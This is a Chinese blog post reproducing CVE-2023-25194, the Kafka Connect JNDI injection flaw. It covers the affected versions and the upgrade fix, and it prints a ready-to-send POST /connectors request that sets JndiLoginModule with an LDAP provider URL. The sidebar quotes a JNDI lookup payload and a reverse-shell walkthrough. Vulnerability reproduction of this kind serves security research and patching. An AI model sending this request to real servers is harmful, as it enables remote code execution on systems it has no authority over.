[CVE-2023-25194] 开源流处理平台Kafka JNDI注入漏洞

最新推荐文章于 2024-08-11 21:14:52 发布
最新推荐文章于 2024-08-11 21:14:52 发布
阅读量536 收藏 2
点赞数
分类专栏: 漏洞复现 文章标签: kafka 网络安全
追光者
本文链接:https://blog.csdn.net/qq_44942265/article/details/129477730
版权

0x01 漏洞概述

        Kafka 是 Apache 软件基金会的一种分布式的、基于发布/订阅的消息系统,可以处理消费者在网站中的所有动作流数据。Kafka Connect 是一种工具,用于在 Apache Kafka 和其他数据系统之间以可扩展且可靠的方式传输数据。
        Kafka 2.3.0 至 3.3.2 版本中,攻击者可通过将 Connect 的任意 Kafka 客户端的 sasl.jaas.config 属性设置为 可通过创建或修改客户端配置,进行 JNDI 注入攻击 0day 相关漏洞情报,攻击者可以使用基于 SASL JAAS 配置和 SASL 协议的任意 Kafka 客户端,在对 Kafka Connect worker 创建或修改连接器时,通过构造特殊的配置,进行 JNDI 注入。
        Apache Kafka Connect 服务在 2.3.0 至 3.3.2 版本中,由于连接时支持使用基于 JNDI 认证的 SASL JAAS 配置,导致配置在被攻击者可控的情况下,可能通过 JNDI 注入执行任意代码。
此漏洞不影响 Kafka server (broker),Kafka Connect 服务通常用于在云平台中提供 Kafka 数据迁移、数据同步的管道能力,其默认 HTTP API 开放于 8083 端口。

0x02 受影响的版本

        org.apache.kafka:kafka-clients@[2.3.0, 3.4.0)

0x03 漏洞建议

        将组件 org.apache.kafka:kafka-clients 升级至 3.4.0 及以上版本

0x04 漏洞POC

#1529790 Kafka Connect RCE via connector SASL JAAS JndiLoginModule configuration (hackerone.com)icon-default.png?t=N176https://hackerone.com/reports/1529790

ohnonoyesyes/CVE-2023-25194 (github.com)icon-default.png?t=N176https://github.com/ohnonoyesyes/CVE-2023-25194

POST /connectors HTTP/1.1
Host: xxxx:8083
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/json
Connection: close
Content-Length: 1109

{"name": "test", 
   "config":
    {
        "connector.class":"io.debezium.connector.mysql.MySqlConnector",
    	"database.hostname": "xxxxx",
    	"database.port": "3306",
    	"database.user": "root",
    	"database.password": "xxxxxx",
    	"database.dbname": "xxxx",
    	"database.sslmode": "SSL_MODE",
        "database.server.id": "1234",
    	"database.server.name": "localhost",
        "table.include.list": "MYSQL_TABLES",
    	"tasks.max":"1",
        "topic.prefix": "aaa22",
        "debezium.source.database.history": "io.debezium.relational.history.MemoryDatabaseHistory",
        "schema.history.internal.kafka.topic": "aaa22",
        "schema.history.internal.kafka.bootstrap.servers": "kafka:9202",
    	"database.history.producer.security.protocol": "SASL_SSL",
    	"database.history.producer.sasl.mechanism": "PLAIN",
    	"database.history.producer.sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://aaa\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
    }
}

Light Chaser1
关注
专栏目录
红队攻防渗透技术实战程:组件安全:Jackson&FastJson&XStream
HACKONE的博客
06-15 243
阿里巴巴公司开源的json解析器,它可以解析JSON格式的字符串,支持将JavaBean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。利用POC:https://github.com/kezibei/fastjson_payload。历史漏洞:https://avd.aliyun.com/search?q=fastjson。历史漏洞:https://avd.aliyun.com/search?历史漏洞:https://avd.aliyun.com/search?
红队攻防渗透技术实战程:组件安全:Solr&Shiro&log4j
HACKONE的博客
06-15 260
历史漏洞:https://avd.aliyun.com/search?历史漏洞:https://avd.aliyun.com/search?历史漏洞:https://avd.aliyun.com/search?黑盒特征:盲打 会问蓝队攻击特征(${jndi:rmi:///osutj8})影响范围:Apache Shiro
漏洞真实影响分析】Apache Kafka Connect 模块JNDI注入CVE-2023-25194
murphysec的博客
02-13 4709
Apache Kafka Connect 是Kafka中用于和其他数据系统传输数据的服务,其独立运行版本可以在Kafka发布包中通过bin/connect-standalone.sh启动,默认会在8083端口开启HTTP REST API服务,可对连接器(Connector)的配置进行操作
漏洞复现-Apache Kafka Clients JNDI注入漏洞 (CVE-2023-25194)
最新发布
玄道的网安博客
08-11 429
在版本3.3.2及以前,Apache Kafka clients中存在一处JNDI注入漏洞。如果攻击者在连接的时候可以控制属性sasl.jaas.config的值为com.sun.security.auth.module.JndiLoginModule,则可以发起JNDI连接,进而导致JNDI注入漏洞,执行任意命令。方法,做完客户端的判断和安全协议的判断之后,调用了。判断 SASL 模式是否开启,开启了才会往下跟进到。方法,跟进,发现其中还是加载了一些配置。方法,最后 Jndi 注入
Apache Kafka JNDI注入(CVE-2023-25194)漏洞复现浅析
蚁景网安学院
03-23 809
Apache Kafka是一个开源的分布式事件平台,被数千家公司用于高性能数据管道、分析、数据集成和任务关键型应用程序。
CVE-2023-25194漏洞 Apache Kafka Connect JNDI注入漏洞
Fiverya的博客
02-10 3856
CVE-2023-25194漏洞
Apache Kafka CVE-2023-25194(metasploit版)
m0_73605862的博客
12-06 591
首先,打开metasploit,然后查询需要攻击的板块,利用板块。进入到板块以后,我们需要查看配置信息,并且对端口,host,ssl,版本,payload等进行更改。然后修改完成以后,进行攻击。得到shell以后,验证成功。这个漏洞的payload要使用unix系统的python的shell的反向连接才能成功。Step3:访问特定端口,然后靶标应用。Step2:docker查看映射端口。Step1:用docker搭建环境。
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 1365
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
漏洞研究》Apache Log4j2 远程代码执行漏洞
1
11-04 1784
Apache Log4j2 组件存在远程代码执行漏洞(CVE-2021-44228),该漏洞是由于 Apache Log4j2 某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。
修复 Apache Kafka 中的远程代码执行漏洞CVE-2023-25194
11-30 1118
Kafka Connect 中发现可能的 RCE 和拒绝服务问题。更新 阿帕奇软件基金会 (ASF) 已解决了一个漏洞,该漏洞可被利用来使用 Kafka Connect 发起远程代码执行 (RCE) 攻击。该关键漏洞于 2 月 8 日公布,被追踪为 CVE-2023-25194。Apache Kafka Connect 是 Apache Kafka 的一个免费开源组件,是系统、数据库和键值存储之间数据集成的中心枢纽。
CVE-2023-25194 Kafka JNDI 注入分析
YJ_12340的博客
11-13 894
Apache Kafka 是一个分布式数据处理平台,可以实时发布、订阅、存储和处理数据Kafka Connect 是一种用于在 kafka 和其他系统之间可扩展、可靠的式传输数据的工具。攻击者可以利用基于 SASL JAAS 配置和 SASL 协议的任意 Kafka 客户端,对 Kafka Connect worker 创建或修改连接器时,通过构造特殊的配置,进行 JNDI 注入来实现远程代码执行。
Kafka漏洞修复之CVE-2023-25194修复措施验证
CharlesYan的博客
02-19 4800
Apache Kafka Connect 模块通过JNDI 注入任意代码漏洞修复措施验证,包括Linux安装多版本JDK动态切换、验证OpenJDK与Kafka3.4.0的兼容性以及Linux中文件配置的优先级等
Apache Kafka 漏洞CVE-2023-25194】说明及解决建议
热门推荐
EdwardWang_的博客
02-10 1万+
Apache Kafka 漏洞CVE-2023-25194】说明 及 解决建议
Apache Kafka JNDI注入注入漏洞(CVE-2023-25194)
Continuejww的博客
12-13 1570
Apache Kafka是一个开源分布式消息队列,Kafka clients是相对应的Java客户端。在版本3.3.2及以前,Apache Kafka clients中存在一处JNDI注入漏洞。如果攻击者在连接的时候可以控制属性的值为,则可以发起JNDI连接,进而导致JNDI注入漏洞,执行任意命令。由于这个漏洞是存在于Java库kafka-clients中,所以我们需要在真实环境下找到使用了这个库的软件,且用户可以控制连接参数。
【已复现】Apache Kafka Connect JNDI注入漏洞(CVE-2023-25194)安全风险通告
smellycat000的专栏
02-09 4136
奇安信CERT致力于第一时间为企业级用户提供安全风险通告和有效解决方案。安全通告Kafka Connect是一种用于在Apache Kafka和其他系统之间可扩展且可靠地式传输数据的工具。它使快速定义将大量数据移入和移出Kafka的连接器变得简单。Kafka Connect可以摄取整个数据库或从所有应用程序服务器收集指标到Kafka主题中,使数据可用于低延迟的处理。近日,奇安信CERT监测到A...
【高危】 Apache Kafka 远程代码执行漏洞复现及攻击拦截 (CVE-2023-25194)
xsharkrasp的博客
06-09 1761
Apache Kafka是一个分布式数据处理平台,可以实时发布、订阅、存储和处理数据Kafka Connect是一种用于在kafka和其他系统之间可扩展、可靠的式传输数据的工具。攻击者可以利用基于SASLJAAS 配置和SASL 协议的任意Kafka客户端,对Kafka Connect worker 创建或修改连接器时,通过构造特殊的配置,进行JNDI 注入来实现远程代码执行。
Kafka Connect JNDI注入漏洞复现(CVE-2023-25194)
qq_50854662的博客
11-20 279
Kafka Connect JNDI注入漏洞复现(CVE-2023-25194)
Kafka反序列化RCE漏洞CVE-2023-34040)
蚁景网安学院
11-03 727
Spring Kafka 是 Spring Framework 生态系统中的一个模块,用于简化在 Spring 应用程序中集成 Apache Kafka 的过程,记录 (record) 指 Kafka 消息中的一条记录。这一个漏洞所影响的组件其实是 Spring-Kafka,严格意义上来说并不算是 kafka漏洞,应该算是 Spring 的漏洞
卡巴斯基揭示CVE-2023-28252 Windows越界写入漏洞
资源摘要信息:"CVE-2023-28252是一个越界写入漏洞,存在于clfs.sys(通用日志文件系统驱动程序)中。卡巴斯基披露了这个在野0day提权漏洞,它允许攻击者获取Windows中的system权限——Windows的最高用户权限级别。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Light Chaser1

一键三连好习惯

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值